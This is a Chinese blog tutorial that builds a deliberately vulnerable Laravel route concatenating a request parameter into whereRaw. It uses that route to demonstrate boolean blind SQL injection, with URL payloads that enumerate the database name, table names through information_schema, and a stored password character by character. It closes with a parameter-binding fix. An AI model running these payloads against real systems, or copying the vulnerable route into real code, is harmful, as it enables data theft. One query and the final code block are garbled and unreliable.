通过laravel漏洞实例解析sql盲注原理

广告:宝塔Linux面板高效运维的服务器管理软件 点击【 https://www.bt.cn/p/uNLv1L 】立即购买

通过laravel漏洞实例解析sql盲注原理

本篇文章给大家带来了关于laravel的相关知识,其中主要介绍了怎样通过造一个laravel漏洞来讲解sql盲注原理,所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击,下面一起来看一下,希望对大家有帮助。

【相关推荐:laravel视频教程】

环境

composer create-project laravel/laravel lar9 // 安装laravel9// 编辑.env  修改为DEBUG=false 配置数据库DEBUG=falseDB_HOST=....php artisan migratephp artisan serve // 启动// 插入数据insert into users(`name`,`email`,`password`) values('xxh','4******qq.com','worldhello');
登录后复制

创建漏洞

// routes/web.phpRoute::get('/', function () { $id = request()->id; $user = \App\Models\User::whereRaw('id = '.$id)->first(); return $user->name ?? '';});// 最后转换的sql是: select * from users where id = $id
登录后复制

测试

http://127.0.0.1:8000/?id=1'// 500http://127.0.0.1:8000/?id=1 and 1=2// select * from users where id = 1 and 1=2; 返回空http://127.0.0.1:8000/?id=1 and 1=1 // select * from users where id = 1 and 1=1 返回xxh
登录后复制步骤

数据库名

猜出数据名长度

url: http://127.0.0.1:8000/?id=1 and length(database()) = 1select * from users where id = 1 and length(database()) = 1select * from users where id = 1 and length(database()) = 2// 一直循环下去
登录后复制

猜出数据库名

从第一步 知道了数据库名长度`select * from users where id = 1 and substr(database(),1,1) =a` `select * from users where id = 1 and substr(database(),1,1) =b` // 一直循环下去 找到数据库名的第一个做字符  然后找第二个字符  直到找完数据库名的长度
登录后复制

最终: laravel_project

表名

以下的步骤和猜数据库差不多,就简说了。

information_schema

information_schema 是 mysql 自带的,

数据库名 表名 列类型 等都有记录,猜表 字段明需要从这个数据库来。

猜 laravel_project 的表数量

url:   http://127.0.0.1:8000/?id=1 and (select count(*) from information_schema.tables where table_schema ="laravel_project" ) = 5mysql> select count(*) from information_schema.tables where table_schema ="laravel_projeelect count(column_name) from information_schema.columns where table_name= ’usersct";+----------+| count(*) |+----------+|        5 |+----------+
登录后复制

猜第一个表名的长度

与 [猜出数据名长度] 此不多。

猜第一个表名

url:   http://127.0.0.1:8000/?id=1 and ( select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1) = 'f'mysql> select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1;+------------------------+| substr(table_name,1,1) |+------------------------+| f                      |+------------------------+// 得出第一个表的第一个字段是f  然后查第
登录后复制

最终得出第一个表名称为: failed_jobs

猜字段

和猜表一模一样的逻辑。

select count(column_name) from information_schema.columns where table_name= 'failed_jobs'; //  fail_jobs字段总数
登录后复制

猜数据

数据这才是最重要的。

因为 failed_jobs 没数据,所以我换成 users 来。

users 有个 password 字段。

mysql> select substr((select password from users limit 0,1),1,1);+----------------------------------------------------+| substr((select password from users limit 0,1),1,1) |+----------------------------------------------------+| w                                                  |+----------------------------------------------------+得出第一个是w,存起来,最后判断 mysql> select substr((select password from users limit 0,1),1,2);+----------------------------------------------------+| substr((select password from users limit 0,1),1,2) |+----------------------------------------------------+| wo                                                 |+----------------------------------------------------+第二个值为o用第一个值 + 第二个值作为盲注
登录后复制

……

防御

(有时候 where 不满足需求,就需要 whereRaw)

如果需要,记得绑定就好。

Route::get('/', function () { $id = request()->id; $user = \App\Models\User::whereRaw('id = ?',[$id])->first(); return $user->name ?? '';});
登录后复制

只要安份的用框架,不会会漏洞的。

那些老项目,漏洞满地飞。

现在这个时代,找漏洞难登天。

Ps

上面为了讲解简单,用是最简单的查找。

手工盲注应该用二分查找。

// routes/web.phpRoute::get('/', function () { $id = request()->id; $user = \App\Models\User::whereRaw('id = '.$id)->first(); return $user->name ?? '';});// 最后转换的sql是: select * from users where id = $id0
登录后复制

最好还是直接借助工具 sqlmap, 直接扫出来。

【相关推荐:laravel视频教程】

以上就是通过laravel漏洞实例解析sql盲注原理的详细内容,更多请关注9543建站博客其它相关文章!

广告:SSL证书一年128.66元起,点击购买~~~

9543建站博客
一个专注于网站开发、微信开发的技术类纯净博客。
作者头像
admin创始人

肥猫,知名SEO博客站长,14年SEO经验。

上一篇:PHP8中的named arguments可以让函数参数更加易读
下一篇:如何用PHP正则表达式验证输入字符串是否为IPv4地址格式

发表评论

关闭广告
关闭广告